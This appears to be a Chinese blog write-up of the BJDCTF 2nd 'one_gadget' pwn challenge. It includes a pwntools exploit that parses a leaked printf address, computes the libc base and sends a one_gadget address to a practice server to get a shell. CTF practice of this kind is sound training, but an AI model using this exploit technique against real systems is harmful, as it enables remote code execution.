[BJDCTF 2nd]one_gadget

妖狐艹你老母 2023-02-17 03:55 82阅读 0赞

在这里插入图片描述

在这里插入图片描述
在这里插入图片描述
这里主要是用到了这个工具,但是这个工具的原理我还不了解,但是我调试了一下,最主要的是这个工具提供的shell需要满足它下面给的约束条件,对于这个题目而言要利用这个shell的条件就是[rsp + 0x70] == NULL
在这里插入图片描述
exp

  1. from pwn import *
  2. context(log_level = 'debug')
  3. libc = ELF('./libc/libc-2.29.64.so')
  4. p = remote('node3.buuoj.cn', 25656)
  5. p.recvuntil('0x'.encode())
  6. printf_addr = int(p.recvn(12), 16)
  7. printf_offset = libc.sym['printf']
  8. libc_base = printf_addr - printf_offset
  9. execve_offset = 0x106ef8
  10. execve_addr = libc_base + execve_offset
  11. payload = str(execve_addr)
  12. p.sendline(payload)
  13. p.interactive()

在这里插入图片描述

发表评论

表情:
评论列表 (有 0 条评论,82人围观)

还没有评论,来说两句吧...

相关阅读